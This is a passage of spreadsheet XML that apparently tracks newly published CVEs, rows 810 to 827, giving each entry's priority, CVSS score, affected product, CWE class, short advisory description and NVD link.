      <c r="P810" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q810" s="5" t="inlineStr"/>
      <c r="R810" s="5" t="inlineStr">
        <is>
          <t>CWE-384</t>
        </is>
      </c>
      <c r="S810" s="5" t="inlineStr">
        <is>
          <t>Photoshop Mobile is affected by a Session Fixation vulnerability that could result in privilege escalation. An attacker could leverage this vulnerability to gain access to sensitive resources. Exploit depends on conditions beyond the attacker's control. Exploitation of this issue requires user interaction in that a victim must interact with a malicious webpage. Scope is changed.</t>
        </is>
      </c>
      <c r="T810" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76196</t>
        </is>
      </c>
    </row>
    <row r="811">
      <c r="A811" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B811" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C811" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78461</t>
        </is>
      </c>
      <c r="D811" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E811" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F811" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G811" s="5" t="inlineStr"/>
      <c r="H811" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I811" s="5" t="inlineStr"/>
      <c r="J811" s="5" t="inlineStr"/>
      <c r="K811" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L811" s="5" t="inlineStr"/>
      <c r="M811" s="5" t="inlineStr"/>
      <c r="N811" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O811" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P811" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q811" s="5" t="inlineStr"/>
      <c r="R811" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S811" s="5" t="inlineStr">
        <is>
          <t>Improper limitation of a pathname to a restricted directory ('path traversal') in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="T811" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78461</t>
        </is>
      </c>
    </row>
    <row r="812">
      <c r="A812" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B812" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C812" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81383</t>
        </is>
      </c>
      <c r="D812" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E812" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F812" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G812" s="5" t="inlineStr"/>
      <c r="H812" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I812" s="5" t="inlineStr"/>
      <c r="J812" s="5" t="inlineStr"/>
      <c r="K812" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L812" s="5" t="inlineStr"/>
      <c r="M812" s="5" t="inlineStr"/>
      <c r="N812" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O812" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P812" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q812" s="5" t="inlineStr"/>
      <c r="R812" s="5" t="inlineStr">
        <is>
          <t>CWE-706</t>
        </is>
      </c>
      <c r="S812" s="5" t="inlineStr">
        <is>
          <t>Use of incorrectly-resolved name or reference in Visual Studio Code allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T812" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81383</t>
        </is>
      </c>
    </row>
    <row r="813">
      <c r="A813" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B813" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C813" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84003</t>
        </is>
      </c>
      <c r="D813" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E813" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F813" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G813" s="5" t="inlineStr"/>
      <c r="H813" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I813" s="5" t="inlineStr"/>
      <c r="J813" s="5" t="inlineStr"/>
      <c r="K813" s="5" t="inlineStr">
        <is>
          <t>microsoft:azure\/msal-node</t>
        </is>
      </c>
      <c r="L813" s="5" t="inlineStr"/>
      <c r="M813" s="5" t="inlineStr"/>
      <c r="N813" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O813" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P813" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q813" s="5" t="inlineStr"/>
      <c r="R813" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="S813" s="5" t="inlineStr">
        <is>
          <t>Authentication bypass by capture-replay in Microsoft Authentication Library (MSAL) for Node.js allows an unauthorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="T813" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84003</t>
        </is>
      </c>
    </row>
    <row r="814">
      <c r="A814" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B814" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C814" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28613</t>
        </is>
      </c>
      <c r="D814" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E814" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F814" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G814" s="5" t="inlineStr"/>
      <c r="H814" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I814" s="5" t="inlineStr"/>
      <c r="J814" s="5" t="inlineStr"/>
      <c r="K814" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L814" s="5" t="inlineStr"/>
      <c r="M814" s="5" t="inlineStr"/>
      <c r="N814" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O814" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P814" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q814" s="5" t="inlineStr"/>
      <c r="R814" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S814" s="5" t="inlineStr">
        <is>
          <t>In initAppLinkTypeAndIntent of ChannelImpl.java, there is a possible launch an arbitrary intent due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.</t>
        </is>
      </c>
      <c r="T814" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28613</t>
        </is>
      </c>
    </row>
    <row r="815">
      <c r="A815" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B815" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C815" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28626</t>
        </is>
      </c>
      <c r="D815" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E815" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F815" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G815" s="5" t="inlineStr"/>
      <c r="H815" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I815" s="5" t="inlineStr"/>
      <c r="J815" s="5" t="inlineStr"/>
      <c r="K815" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L815" s="5" t="inlineStr"/>
      <c r="M815" s="5" t="inlineStr"/>
      <c r="N815" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O815" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P815" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q815" s="5" t="inlineStr"/>
      <c r="R815" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="S815" s="5" t="inlineStr">
        <is>
          <t>In onCreate of SetupPassthroughActivity.java, there is a possible way to launch arbitrary activity due to Intent redirection . This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.</t>
        </is>
      </c>
      <c r="T815" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28626</t>
        </is>
      </c>
    </row>
    <row r="816">
      <c r="A816" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B816" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C816" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28656</t>
        </is>
      </c>
      <c r="D816" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E816" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F816" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G816" s="5" t="inlineStr"/>
      <c r="H816" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I816" s="5" t="inlineStr"/>
      <c r="J816" s="5" t="inlineStr"/>
      <c r="K816" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L816" s="5" t="inlineStr"/>
      <c r="M816" s="5" t="inlineStr"/>
      <c r="N816" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O816" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P816" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q816" s="5" t="inlineStr"/>
      <c r="R816" s="5" t="inlineStr">
        <is>
          <t>CWE-1021</t>
        </is>
      </c>
      <c r="S816" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of DeviceAdminAdd.java, there is a possible way to an overlay due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.</t>
        </is>
      </c>
      <c r="T816" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28656</t>
        </is>
      </c>
    </row>
    <row r="817">
      <c r="A817" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B817" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C817" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45528</t>
        </is>
      </c>
      <c r="D817" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E817" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F817" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G817" s="5" t="inlineStr"/>
      <c r="H817" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I817" s="5" t="inlineStr"/>
      <c r="J817" s="5" t="inlineStr"/>
      <c r="K817" s="5" t="inlineStr"/>
      <c r="L817" s="5" t="inlineStr"/>
      <c r="M817" s="5" t="inlineStr"/>
      <c r="N817" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O817" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P817" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q817" s="5" t="inlineStr"/>
      <c r="R817" s="5" t="inlineStr">
        <is>
          <t>CWE-926</t>
        </is>
      </c>
      <c r="S817" s="5" t="inlineStr">
        <is>
          <t>In getManageSpaceActivityIntent of StorageManagerService.java, there is a possible LaunchAnyWhere chain due to an unsafe PendingIntent. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.</t>
        </is>
      </c>
      <c r="T817" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45528</t>
        </is>
      </c>
    </row>
    <row r="818">
      <c r="A818" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B818" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C818" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69477</t>
        </is>
      </c>
      <c r="D818" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E818" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F818" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G818" s="5" t="inlineStr"/>
      <c r="H818" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I818" s="5" t="inlineStr"/>
      <c r="J818" s="5" t="inlineStr"/>
      <c r="K818" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:access, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L818" s="5" t="inlineStr"/>
      <c r="M818" s="5" t="inlineStr"/>
      <c r="N818" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O818" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P818" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q818" s="5" t="inlineStr"/>
      <c r="R818" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S818" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Access allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T818" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69477</t>
        </is>
      </c>
    </row>
    <row r="819">
      <c r="A819" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B819" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C819" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78627</t>
        </is>
      </c>
      <c r="D819" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E819" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F819" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G819" s="5" t="inlineStr"/>
      <c r="H819" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I819" s="5" t="inlineStr"/>
      <c r="J819" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K819" s="5" t="inlineStr"/>
      <c r="L819" s="5" t="inlineStr"/>
      <c r="M819" s="5" t="inlineStr"/>
      <c r="N819" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O819" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P819" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q819" s="5" t="inlineStr"/>
      <c r="R819" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="S819" s="5" t="inlineStr">
        <is>
          <t>The Okta Hyperdrive Integration installer does not mask the OAuth client secret when passed as an MSI property. The credential is recorded in plaintext in the installer log, the Application Event Log, and the process command line, all of which are readable by an authenticated local user on the workstation.</t>
        </is>
      </c>
      <c r="T819" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78627</t>
        </is>
      </c>
    </row>
    <row r="820">
      <c r="A820" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B820" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C820" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86806</t>
        </is>
      </c>
      <c r="D820" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E820" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F820" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G820" s="5" t="inlineStr"/>
      <c r="H820" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I820" s="5" t="inlineStr"/>
      <c r="J820" s="5" t="inlineStr"/>
      <c r="K820" s="5" t="inlineStr"/>
      <c r="L820" s="5" t="inlineStr"/>
      <c r="M820" s="5" t="inlineStr"/>
      <c r="N820" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O820" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P820" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q820" s="5" t="inlineStr"/>
      <c r="R820" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S820" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in opengeos GeoLibre up to 2.3.0. Impacted is the function _is_within_roots. This manipulation causes server-side request forgery. The attack can be initiated remotely. Upgrading to version 2.4.0 is recommended to address this issue. Patch name: b745f62e29fa37364686525a21eee5e5c0f8a369. It is recommended to upgrade the affected component.</t>
        </is>
      </c>
      <c r="T820" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86806</t>
        </is>
      </c>
    </row>
    <row r="821">
      <c r="A821" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B821" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C821" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76561</t>
        </is>
      </c>
      <c r="D821" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E821" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F821" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G821" s="5" t="inlineStr"/>
      <c r="H821" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I821" s="5" t="inlineStr"/>
      <c r="J821" s="5" t="inlineStr"/>
      <c r="K821" s="5" t="inlineStr"/>
      <c r="L821" s="5" t="inlineStr"/>
      <c r="M821" s="5" t="inlineStr"/>
      <c r="N821" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O821" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P821" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q821" s="5" t="inlineStr"/>
      <c r="R821" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S821" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Dogtag PKI, as used by FreeIPA's certificate authority component. The certificate profile import functionality does not fully validate uploaded profile content beyond the profile ID. An authenticated user with CA Administrator privileges can exploit Dogtag's ExternalProcessConstraint mechanism to execute arbitrary commands with attacker-controlled environment variables, achieving code execution as the pkiuser account.</t>
        </is>
      </c>
      <c r="T821" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76561</t>
        </is>
      </c>
    </row>
    <row r="822">
      <c r="A822" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B822" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C822" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81349</t>
        </is>
      </c>
      <c r="D822" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E822" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F822" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G822" s="5" t="inlineStr"/>
      <c r="H822" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I822" s="5" t="inlineStr"/>
      <c r="J822" s="5" t="inlineStr"/>
      <c r="K822" s="5" t="inlineStr"/>
      <c r="L822" s="5" t="inlineStr"/>
      <c r="M822" s="5" t="inlineStr"/>
      <c r="N822" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O822" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P822" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q822" s="5" t="inlineStr"/>
      <c r="R822" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S822" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an os command ('os command injection') in Azure HDInsights allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T822" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81349</t>
        </is>
      </c>
    </row>
    <row r="823">
      <c r="A823" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B823" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C823" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81806</t>
        </is>
      </c>
      <c r="D823" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E823" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F823" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G823" s="5" t="inlineStr"/>
      <c r="H823" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I823" s="5" t="inlineStr"/>
      <c r="J823" s="5" t="inlineStr"/>
      <c r="K823" s="5" t="inlineStr"/>
      <c r="L823" s="5" t="inlineStr"/>
      <c r="M823" s="5" t="inlineStr"/>
      <c r="N823" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O823" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P823" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q823" s="5" t="inlineStr"/>
      <c r="R823" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S823" s="5" t="inlineStr">
        <is>
          <t>Server-Side Request Forgery (SSRF) vulnerability in John Darrel Hide My WP Ghost allows Server Side Request Forgery.
This issue affects Hide My WP Ghost: from n/a through 7.0.09.</t>
        </is>
      </c>
      <c r="T823" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81806</t>
        </is>
      </c>
    </row>
    <row r="824">
      <c r="A824" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B824" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C824" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82061</t>
        </is>
      </c>
      <c r="D824" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E824" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F824" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G824" s="5" t="inlineStr"/>
      <c r="H824" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I824" s="5" t="inlineStr"/>
      <c r="J824" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K824" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L824" s="5" t="inlineStr"/>
      <c r="M824" s="5" t="inlineStr"/>
      <c r="N824" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O824" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P824" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q824" s="5" t="inlineStr"/>
      <c r="R824" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S824" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T824" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82061</t>
        </is>
      </c>
    </row>
    <row r="825">
      <c r="A825" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B825" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C825" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82071</t>
        </is>
      </c>
      <c r="D825" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E825" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F825" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G825" s="5" t="inlineStr"/>
      <c r="H825" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I825" s="5" t="inlineStr"/>
      <c r="J825" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K825" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L825" s="5" t="inlineStr"/>
      <c r="M825" s="5" t="inlineStr"/>
      <c r="N825" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O825" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P825" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q825" s="5" t="inlineStr"/>
      <c r="R825" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S825" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T825" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82071</t>
        </is>
      </c>
    </row>
    <row r="826">
      <c r="A826" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B826" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C826" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84387</t>
        </is>
      </c>
      <c r="D826" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E826" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F826" s="5" t="inlineStr">
        <is>
          <t>psirt@fortinet.com</t>
        </is>
      </c>
      <c r="G826" s="5" t="inlineStr"/>
      <c r="H826" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I826" s="5" t="inlineStr"/>
      <c r="J826" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K826" s="5" t="inlineStr"/>
      <c r="L826" s="5" t="inlineStr"/>
      <c r="M826" s="5" t="inlineStr"/>
      <c r="N826" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O826" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P826" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q826" s="5" t="inlineStr"/>
      <c r="R826" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="S826" s="5" t="inlineStr">
        <is>
          <t>A improper neutralization of special elements used in a command ('command injection') vulnerability in Fortinet FortiSandbox 5.2.0, FortiSandbox 5.0.0 through 5.0.6, FortiSandbox 4.4.0 through 4.4.9 may allow attacker to execute unauthorized code or commands via &lt;insert attack vector here&gt;</t>
        </is>
      </c>
      <c r="T826" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84387</t>
        </is>
      </c>
    </row>
    <row r="827">
      <c r="A827" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B827" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C827" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86733</t>
        </is>
